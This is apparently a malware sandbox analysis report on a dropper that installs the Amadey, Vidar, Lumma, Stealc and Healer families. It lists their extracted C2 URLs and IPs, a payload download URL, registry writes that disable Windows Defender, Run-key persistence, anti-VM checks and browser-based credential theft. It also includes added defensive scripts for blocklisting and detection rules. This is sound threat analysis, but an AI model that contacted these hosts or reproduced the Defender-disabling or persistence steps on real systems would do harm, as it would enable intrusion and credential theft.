Analysis
max time kernel: 279s
max time network: 286s
platform: windows10-2004_x64
resource: win10v2004-20250314-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
submitted: 28/03/2025, 18:26
Static task
static1

Behavioral tasks (every task runs the same sample, 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe)
behavioral1  win10v2004-20250314-en
behavioral2  win7-20241010-en
behavioral3  win10v2004-20250314-en
behavioral4  win10ltsc2021-20250314-en
behavioral5  win11-20250313-en
behavioral6  macos-20241101-en

The memory and file yara hits listed under Signatures reference behavioral3 (win10v2004-20250314-en).
General
Target: 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Size: 1.8MB
MD5: 8480b3439f6f2fe71ff8136c8475a0e1
SHA1: 8f787c424f7a1ac854d26b723008ea29d9f1b1aa
SHA256: 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8
SHA512: 2b72c1f30549156dcf42aff32d2967580147a1cc499ca93f7a3e2b773e814bd9c368772d6ed02031c086b2c8376b405d30c7a43abff0729732232ad008e97958
SSDEEP: 49152:fyPxPnQHIr7nIXvPvwrARGSLEUBLEffrLrr90+:6PxfQoTIXvPYlSLEWgXrLrr
Malware Config

Extracted: download URL (reported twice)
http://176.113.115.7/mine/random.exe

Extracted: amadey
Version: 5.21
Botnet: 092155
C2: http://176.113.115.6
install_dir: bb556cff4a
install_file: rapes.exe
strings_key: a131b127e996a898cd19ffb2d92e481b
url_paths: /Ni9kiput/index.php
(The check-in endpoint is C2 plus url_paths, i.e. http://176.113.115.6/Ni9kiput/index.php; rapes.exe is the name the loader runs under in the signatures below.)

Extracted: vidar
Version: 13.3
Botnet: 11373d37b176b52c098f600f61cdf190
C2 (dead-drop resolvers: the Telegram channel and the Steam profile publish the address of the real C2, they are not the C2 themselves, so block the exact URLs rather than the hosts):
https://t.me/lw25chm
https://steamcommunity.com/profiles/76561199839170361
user_agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Extracted: lumma
C2 (17 URLs; note the near-duplicate pairs 6advennture.top / advennture.top and 5steelixr.live / steelixr.live):
https://6advennture.top/GKsiio
https://oreheatq.live/gsopp
https://castmaxw.run/ganzde
https://weldorae.digital/geds
https://5steelixr.live/aguiz
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://smeltingt.run/giiaus
https://ferromny.digital/gwpd
https://esccapewz.run/ANSbwqy
https://travewlio.shop/ZNxbHi
https://touvrlane.bet/ASKwjq
https://sighbtseeing.shop/ASJnzh
https://holidamyup.today/AOzkns
https://mtriplooqp.world/APowko
https://twxayfarer.live/ALosnz
https://steelixr.live/aguiz

Extracted: stealc
Botnet: trump
C2: http://45.93.20.28
url_path: /85a1cacf11314eb8.php
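The four configs above mix three kinds of indicator: attacker IPs, attacker-registered domains, and dead-drop URLs on services you cannot block wholesale. The script below is an added example (not code from the sandbox or from any of these malware families) that normalizes the extracted values into a blocklist plus a watch list. Every URL and IP is copied from the Malware Config section; the classification of t.me and steamcommunity.com as dead-drop resolvers is this example's own assumption.

```python
"""Turn the extracted configs from this report into a usable blocklist.

Added example for this page, not code from the sandbox or from any of the
malware families. Every URL/IP below is copied from the report's Malware
Config section; DEAD_DROP_HOSTS is this example's own assumption that the
Telegram and Steam URLs in the Vidar config are dead-drop resolvers, i.e.
pages that merely publish the real C2 address.
"""
import ipaddress
from urllib.parse import urlparse

# Legitimate services abused as pointers to the real C2: alert on the exact
# URL at the proxy, never block the whole host.
DEAD_DROP_HOSTS = {"t.me", "steamcommunity.com"}

EXTRACTED = {
    "loader": {"urls": ["http://176.113.115.7/mine/random.exe",
                        "http://176.113.115.7/mine/random.exe"]},  # reported twice
    "amadey": {"c2": "http://176.113.115.6", "url_paths": ["/Ni9kiput/index.php"]},
    "vidar": {"urls": ["https://t.me/lw25chm",
                       "https://steamcommunity.com/profiles/76561199839170361"]},
    "lumma": {"urls": [
        "https://6advennture.top/GKsiio", "https://oreheatq.live/gsopp",
        "https://castmaxw.run/ganzde", "https://weldorae.digital/geds",
        "https://5steelixr.live/aguiz", "https://advennture.top/GKsiio",
        "https://targett.top/dsANGt", "https://smeltingt.run/giiaus",
        "https://ferromny.digital/gwpd", "https://esccapewz.run/ANSbwqy",
        "https://travewlio.shop/ZNxbHi", "https://touvrlane.bet/ASKwjq",
        "https://sighbtseeing.shop/ASJnzh", "https://holidamyup.today/AOzkns",
        "https://mtriplooqp.world/APowko", "https://twxayfarer.live/ALosnz",
        "https://steelixr.live/aguiz"]},
    "stealc": {"c2": "http://45.93.20.28", "url_path": "/85a1cacf11314eb8.php"},
}


def classify_host(host):
    """'ip' for literal addresses, 'dead-drop' for abused services, else 'domain'."""
    try:
        ipaddress.ip_address(host)
        return "ip"
    except ValueError:
        pass
    return "dead-drop" if host in DEAD_DROP_HOSTS else "domain"


def build_iocs(extracted):
    """Flatten every family's config into {family, url, host, kind} records.

    Families that give a bare C2 plus path(s) (Amadey, Stealc) are joined into
    full URLs so the check-in endpoint itself can be matched in proxy logs.
    """
    iocs = []
    for family, cfg in extracted.items():
        urls = list(cfg.get("urls", []))
        base = cfg.get("c2")
        if base:
            paths = cfg.get("url_paths") or [cfg["url_path"]]
            urls += [base.rstrip("/") + path for path in paths]
        for url in urls:
            host = urlparse(url).hostname
            iocs.append({"family": family, "url": url, "host": host,
                         "kind": classify_host(host)})
    return iocs


def blocklist(iocs):
    """Hosts that can be blocked outright: attacker IPs and attacker-registered domains."""
    return sorted({i["host"] for i in iocs if i["kind"] in ("ip", "domain")})


def dead_drops(iocs):
    """Full URLs on shared services; alert on the exact URL, do not block the host."""
    return [i["url"] for i in iocs if i["kind"] == "dead-drop"]


def lookalike_pairs(hosts):
    """Domains that differ only by a leading digit (6advennture.top vs advennture.top).
    Lumma rotates such near-duplicates, so block both and watch for the next variant."""
    hosts = set(hosts)
    return {(h, h.lstrip("0123456789")) for h in hosts
            if h.lstrip("0123456789") != h and h.lstrip("0123456789") in hosts}


if __name__ == "__main__":
    iocs = build_iocs(EXTRACTED)
    for host in blocklist(iocs):
        print("block", host)
    for url in dead_drops(iocs):
        print("watch", url)
    print("lookalikes:", lookalike_pairs(blocklist(iocs)))
```

The loader URL appears twice in the report and collapses to one host; the two Telegram/Steam entries never reach the blocklist, which is the point of the classification step.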
Signatures

Amadey family

Detect Vidar Stealer 37 IoCs
resource  yara_rule
Dump names follow behavioral3/memory/<pid>-<index>-<start>-<end>-memory.dmp; the 37 hits reduce to two distinct regions:
behavioral3, PID 5196, region 0x0000000000400000-0x0000000000429000, 36 dumps (index 36, 35, 37, 38, 53, 74, 75, 85, 88, 92, 93, 94, 98, 99, 117, 454, 455, 457, 458, 461, 465, 466, 470, 471, 613, 834, 979, 980, 983, 984, 985, 987, 989, 990, 2441, 2444)  family_vidar_v7
behavioral3, PID 1360, region 0x0000000000A20000-0x0000000000E68000, 1 dump (index 2460)  family_vidar_v7
Detects Healer, an antivirus disabler dropper 3 IoCs
resource  yara_rule
behavioral3, PID 1360, region 0x0000000000A20000-0x0000000000E68000, 3 dumps (index 2461, 2462, 2770)  healer
The same PID 1360 region also matched family_vidar_v7 above, so one image in ab7380df2b.exe (PID 1360 in the dropped-EXE list) carries both signatures.

Healer family

Lumma family
Modifies Windows Defender DisableAntiSpyware settings 1 IoCs
description  ioc  Process
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"  ab7380df2b.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description  ioc  Process
Key created  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection  ab7380df2b.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"  ab7380df2b.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"  ab7380df2b.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"  ab7380df2b.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"  ab7380df2b.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"  ab7380df2b.exe

Modifies Windows Defender TamperProtection settings 1 IoCs
description  ioc  Process
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"  ab7380df2b.exe

Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description  ioc  Process
Key created  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications  ab7380df2b.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"  ab7380df2b.exe

These rows show intent, not outcome: the paths are recorded under WOW6432Node (ab7380df2b.exe is a 32-bit process), and when tamper protection is enabled Defender ignores registry edits to the real-time protection settings and to the TamperProtection value itself. When validating on a 64-bit host, check both the native and the WOW6432Node view of these keys.
Stealc family

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description  pid  Process  procid_target
PID 2492 created 2560  2492  MSBuild.exe  42
(MSBuild.exe PID 2492 is the process TbV75ZR.exe hollowed via SetThreadContext further down; here it starts PID 2560 with a spoofed parent.)

Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 15 IoCs
description  ioc  Process
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  by: 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe, b842abf8f3.exe, ec9a0b61cd.exe, fd5d9b8176.exe, cf533b34eb.exe, TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE, 74957b3341.exe, ab7380df2b.exe, 483d2fa8a0d53818306efeb32d3.exe (once each), and rapes.exe (6 times, separate instances)
Blocklisted process makes network request 2 IoCs
flow  pid  Process
2579  9224  powershell.exe
2905  11572  powershell.exe
(Flows 2579 and 2905 are the same two flows listed under "Downloads MZ/PE file": both PowerShell instances fetched a PE.)

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Runs PowerShell with its window hidden.
pid  Process
9224 powershell.exe; 11572 powershell.exe; 4756 powershell.exe; 3500 powershell.exe; 7516 powershell.exe; 9500 powershell.exe; 10120 powershell.exe; 10888 powershell.exe; 10960 powershell.exe; 11092 powershell.exe
Downloads MZ/PE file 27 IoCs
flow  pid  Process
rapes.exe (PID 5788): flows 75 (x4), 705 (x4), 62, 629, 668, 588 (x3), 27, 622 (16 downloads)
74957b3341.exe (PID 1192): flow 534 (x6)
svchost015.exe (PID 12980): flow 3566
svchost015.exe (PID 8148): flow 4403
svchost.exe (PID 4980): flow 627
powershell.exe (PID 9224): flow 2579
powershell.exe (PID 11572): flow 2905
rapes.exe is the Amadey install_file from the extracted config, so the 16 downloads by PID 5788 are the loader fetching its follow-on payloads; PIDs 12980 and 8148 are the svchost015.exe processes that fd5d9b8176.exe and cf533b34eb.exe injected into via SetThreadContext.
Drops file in Drivers directory 4 IoCs
description  ioc  Process
File created  C:\Windows\System32\Drivers\6bbb4d94.sys  a28245d7.exe
File created  C:\Windows\System32\Drivers\klupd_6bbb4d94a_arkmon.sys  a28245d7.exe
File created  C:\Windows\System32\Drivers\klupd_6bbb4d94a_klbg.sys  a28245d7.exe
File created  C:\Windows\System32\Drivers\06b074ad.sys  a28245d7.exe

Sets service image path in registry 2 TTPs 7 IoCs
description  ioc  Process
Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\6bbb4d94\ImagePath = "System32\\Drivers\\6bbb4d94.sys"  a28245d7.exe
Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_arkmon\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_arkmon.sys"  a28245d7.exe
Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_klbg\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_klbg.sys"  a28245d7.exe
Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_klark\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_klark.sys"  a28245d7.exe
Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_mark\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_mark.sys"  a28245d7.exe
Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_6bbb4d94a_arkmon.sys"  a28245d7.exe
Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\06b074ad\ImagePath = "System32\\Drivers\\06b074ad.sys"  a28245d7.exe

Caveat for triage: the klupd_* driver names, the klark/klbg/arkmon service names and the C:\KVRT2020_Data\Temp\... path are the on-disk footprint of Kaspersky Virus Removal Tool (KVRT), which a28245d7.exe appears to carry or run. The same process accounts for the SafeBoot\Minimal entry, the KasperskyLab registry key open and the raw PhysicalDrive0 access further down. ImagePath is set for klark.sys and mark.sys without a matching file drop in the rows above. Check the signatures on the dropped .sys files before treating them as attacker kernel components.
Uses browser remote debugging 2 TTPs 25 IoCs
Can be used to control the browser and steal sensitive information such as credentials and session cookies. Browsers started with remote debugging enabled hand out cookies and sessions over the DevTools protocol, so the stealer never has to decrypt the on-disk stores.
pid  Process
msedge.exe (10): 4180, 5672, 6088, 6024, 4064, 2952, 3612, 5540, 4900, 4176
chrome.exe (15): 1636, 2004, 3920, 3652, 5404, 5472, 3124, 3840, 5432, 6368, 6484, 5424, 5020, 2376, 3784
Checks BIOS information in registry 2 TTPs 30 IoCs
BIOS information is often read in order to detect sandboxing environments.
description  ioc  Process
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  by: rapes.exe (x6), 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe, 483d2fa8a0d53818306efeb32d3.exe, 74957b3341.exe, ab7380df2b.exe, b842abf8f3.exe, cf533b34eb.exe, ec9a0b61cd.exe, fd5d9b8176.exe, TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE (15 queries)
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  by: rapes.exe (x6), 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe, 483d2fa8a0d53818306efeb32d3.exe, 74957b3341.exe, ab7380df2b.exe, b842abf8f3.exe, cf533b34eb.exe, ec9a0b61cd.exe, fd5d9b8176.exe, TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE (15 queries)
Checks computer location settings 2 TTPs 5 IoCs
Looks up the country code configured in the registry, likely for geofencing.
description  ioc  Process
Key value queried  \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation  by: 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe, rapes.exe, 7IIl2eE.exe, mshta.exe (x2)

Deletes itself 1 IoCs
pid  Process
2260  w32tm.exe
(PID 2260 is listed under "Executes dropped EXE", so this is a dropped file named w32tm.exe, not necessarily the utility in System32.)
Executes dropped EXE 64 IoCs
pid  Process
5788 rapes.exe; 4880 UYpk7xI.exe; 2428 jokererer.exe; 5488 b842abf8f3.exe; 3608 rapes.exe; 4536 ec9a0b61cd.exe; 1192 74957b3341.exe; 2720 d0fba8cbde.exe
1360 ab7380df2b.exe; 3416 jokererer.exe; 4404 rapes.exe; 5416 UYpk7xI.exe; 6444 7IIl2eE.exe; 3116 TbV75ZR.exe; 2032 Passwords.com; 3580 Rm3cVPI.exe
7092 xZRvIQ5.exe; 7116 u75a1_003.exe; 4992 EPTwCQd.exe; 5584 tzutil.exe; 2260 w32tm.exe; 976 bot.exe
3516 javaruntime_service.exe; 6608 javasupport_update.exe; 1520 javaplugin_update.exe; 6428 javaplatform_update.exe; 6796 javaupdater_update.exe; 1808 javaruntimew.exe; 5200 javaupdaterw.exe; 7052 javasupport.exe
4856 javaruntime_service.exe; 6388 javaplatformw.exe; 1344 javaplugin_update.exe; 7112 javaruntime_platform.exe; 5940 javaupdater_platform.exe; 4492 javasupport.exe; 1500 javaplatform_service.exe; 1084 javaruntimew.exe
1408 javaplugin_update.exe; 3784 javaplugin_update.exe; 7248 javasupport_update.exe; 7368 javaplatform_service.exe; 7412 javaservice_service.exe; 7728 javaservice_service.exe; 7776 javaservice.exe; 7836 javaplatform_service.exe
7884 javasupport_service.exe; 7940 javaplatform_service.exe; 7984 javasupport.exe; 8036 javaupdater_service.exe; 8076 javaservice_service.exe; 8128 javaruntimew.exe; 8180 javaruntime_update.exe; 8228 javaplatform_update.exe
8260 javaruntime_platform.exe; 8304 javaupdater.exe; 8352 javaplatform_platform.exe; 8396 javasupport_platform.exe; 8432 javaplugin.exe; 8496 javaplatform.exe; 8528 javaservice_platform.exe; 8580 javasupport_service.exe
8640 javaruntime_service.exe; 8680 javasupportw.exe
The list stops at 64 entries, so it is likely incomplete. The java*.exe binaries are the "Java Platform SE" masquerade that powershell.exe also registers under the Run key from C:\Users\Admin\AppData\Roaming\Oracle.
Identifies Wine through registry keys 2 TTPs 15 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description  ioc  Process
Key opened  \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine  by: rapes.exe (x6), 74957b3341.exe, fd5d9b8176.exe, 483d2fa8a0d53818306efeb32d3.exe, cf533b34eb.exe, 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe, ab7380df2b.exe, b842abf8f3.exe, ec9a0b61cd.exe, TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE (once each)
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
description  ioc  Process
Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\6bbb4d94.sys  a28245d7.exe
Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\6bbb4d94.sys\ = "Driver"  a28245d7.exe

Loads dropped DLL 27 IoCs
pid  Process
1192  74957b3341.exe (x2)
7564  a28245d7.exe (x25)
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk, where infostealers often target it.

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials.

Unsecured Credentials: Credentials In Files 1 TTPs
Steals credentials from unsecured files.

Windows security modification 2 TTPs 2 IoCs
description  ioc  Process
Key created  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features  ab7380df2b.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"  ab7380df2b.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 13 IoCs
description  ioc  Process
Set value (str)  \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaplatformw.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaplatformw.exe\""  powershell.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\c5bf7783-86ce-4113-89e9-ac37bfec346c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{10a91c6c-893d-4b92-8721-7595eee6e93f}\\c5bf7783-86ce-4113-89e9-ac37bfec346c.cmd\""  a28245d7.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ec9a0b61cd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361710101\\ec9a0b61cd.exe"  rapes.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"  svchost.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"  svchost.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaservice_service.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaservice_service.exe\""  powershell.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaplugin_service.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaplugin_service.exe\""  powershell.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9ff7443f7f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361870101\\9ff7443f7f.exe"  rapes.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361880121\\am_no.cmd"  rapes.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\74957b3341.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361720101\\74957b3341.exe"  rapes.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d0fba8cbde.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361730101\\d0fba8cbde.exe"  rapes.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ab7380df2b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361740101\\ab7380df2b.exe"  rapes.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaplugin_update.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaplugin_update.exe\""  powershell.exe
Three persistence writers are visible: rapes.exe (Amadey) registers each payload it downloaded into a C:\Users\Admin\AppData\Local\Temp\1036xxxxxxx\ folder; powershell.exe registers the "Java Platform SE" binaries under AppData\Roaming\Oracle; a process named svchost.exe registers aitstatic.exe under ProgramData in both the user and the machine Run key.
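The registry writes collected across the Defender, service ImagePath, SafeBoot and Run-key signatures are all the same shape: a process, a key path in NT form, and a value. The script below is an added example (not part of the sandbox report) of detection logic for exactly those writes. SAMPLE_EVENTS are constructed from the report's own IoC rows plus one benign OneDrive Run entry as a negative control; in production the same records would come from Sysmon Event ID 12/13. The WOW6432Node folding, the list of user-writable persistence paths and the set of acceptable driver directories are this example's assumptions.

```python
"""Registry-tamper rules run over the registry writes listed in this report.

Added example, not part of the sandbox report. SAMPLE_EVENTS are constructed
from the report's own IoC rows (plus one benign OneDrive Run entry as a
negative control); key paths use the NT form the report prints.
"""
from collections import Counter

SID = "S-1-5-21-83325578-304917428-1200496059-1000"
HKLM, HKU = "\\REGISTRY\\MACHINE\\", "\\REGISTRY\\USER\\" + SID + "\\"
SAMPLE_EVENTS = [dict(zip(("op", "image", "target", "data"), row)) for row in [
    ("SetValue", "ab7380df2b.exe", HKLM + r"SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware", "1"),
    ("SetValue", "ab7380df2b.exe", HKLM + r"SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring", "1"),
    ("SetValue", "ab7380df2b.exe", HKLM + r"SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection", "0"),
    ("SetValue", "ab7380df2b.exe", HKLM + r"SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications", "1"),
    ("SetValue", "rapes.exe", HKU + r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ec9a0b61cd.exe", r"C:\Users\Admin\AppData\Local\Temp\10361710101\ec9a0b61cd.exe"),
    ("SetValue", "powershell.exe", HKU + r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaplatformw.exe", r'"C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe"'),
    ("SetValue", "a28245d7.exe", HKLM + r"SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_arkmon_7C924DD4\ImagePath", r"\??\C:\KVRT2020_Data\Temp\7C924DD4D20055C80007791130E2D03F\klupd_6bbb4d94a_arkmon.sys"),
    ("SetValue", "a28245d7.exe", HKLM + r"SYSTEM\ControlSet001\Services\6bbb4d94\ImagePath", r"System32\Drivers\6bbb4d94.sys"),
    ("CreateKey", "a28245d7.exe", HKLM + r"SYSTEM\ControlSet001\Control\SafeBoot\Minimal\6bbb4d94.sys", ""),
    # constructed benign control: a normal Run entry pointing into Program Files
    ("SetValue", "explorer.exe", HKU + r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive", r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background"),
]]

HIVES = {"\\REGISTRY\\MACHINE\\": "HKLM\\", "\\REGISTRY\\USER\\": "HKU\\"}


def normalize(path):
    """NT path -> hive form, with the WOW6432Node redirection folded away so a
    32-bit writer and a 64-bit writer hit the same rule."""
    for nt, hive in HIVES.items():
        if path.upper().startswith(nt):
            path = hive + path[len(nt):]
            break
    return path.replace("\\WOW6432Node\\", "\\")


def split_target(ev):
    """Return (key, value_name, data); key and name lower-cased for matching."""
    path = normalize(ev["target"])
    if ev["op"] == "CreateKey":
        return path.lower(), "", ""
    key, _, name = path.rpartition("\\")
    return key.lower(), name.lower(), ev.get("data", "")


DEFENDER_POLICY = "hklm\\software\\policies\\microsoft\\windows defender"
DISABLE_VALUES = {"disableantispyware", "disablerealtimemonitoring",
                  "disablebehaviormonitoring", "disableioavprotection",
                  "disableonaccessprotection", "disablescanonrealtimeenable"}
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\programdata\\")
DRIVER_DIRS = ("system32\\", "\\systemroot\\system32\\", "%systemroot%\\system32\\",
               "c:\\windows\\system32\\")


def under(key, base):
    return key == base or key.startswith(base + "\\")


RULES = {  # each rule takes (key, value_name, data) and returns bool
    "defender_policy_disable": lambda k, n, d:
        under(k, DEFENDER_POLICY) and n in DISABLE_VALUES and d == "1",
    "tamper_protection_off": lambda k, n, d:
        k == "hklm\\software\\microsoft\\windows defender\\features"
        and n == "tamperprotection" and d == "0",
    "defender_notifications_off": lambda k, n, d:
        k.endswith("\\windows defender security center\\notifications")
        and n == "disablenotifications" and d == "1",
    "run_key_user_writable": lambda k, n, d:
        k.endswith(("\\currentversion\\run", "\\currentversion\\runonce"))
        and any(p in d.lower() for p in USER_WRITABLE),
    "service_imagepath_outside_system32": lambda k, n, d:
        "\\services\\" in k and n == "imagepath"
        and not d.lower().strip('"').removeprefix("\\??\\").startswith(DRIVER_DIRS),
    "safeboot_driver_registered": lambda k, n, d:
        "\\control\\safeboot\\minimal\\" in k,
}


def evaluate(events):
    hits = []
    for ev in events:
        key, name, data = split_target(ev)
        for rule, match in RULES.items():
            if match(key, name, data):
                hits.append({"rule": rule, "image": ev["image"],
                             "target": normalize(ev["target"])})
    return hits


def hits_by_rule(hits):
    return Counter(h["rule"] for h in hits)


if __name__ == "__main__":
    for h in evaluate(SAMPLE_EVENTS):
        print(f"{h['rule']:36} {h['image']:16} {h['target']}")
```

Run against the ten sample events the rules fire eight times and stay silent on the OneDrive control and on the driver whose ImagePath stays under System32; the KVRT-style ImagePath outside System32 is flagged on purpose, so that a human decides whether the tool is expected on that host.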
Checks for any installed AV software in registry 1 TTPs 1 IoCs
description  ioc  Process
Key opened  \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\KasperskyLab  a28245d7.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
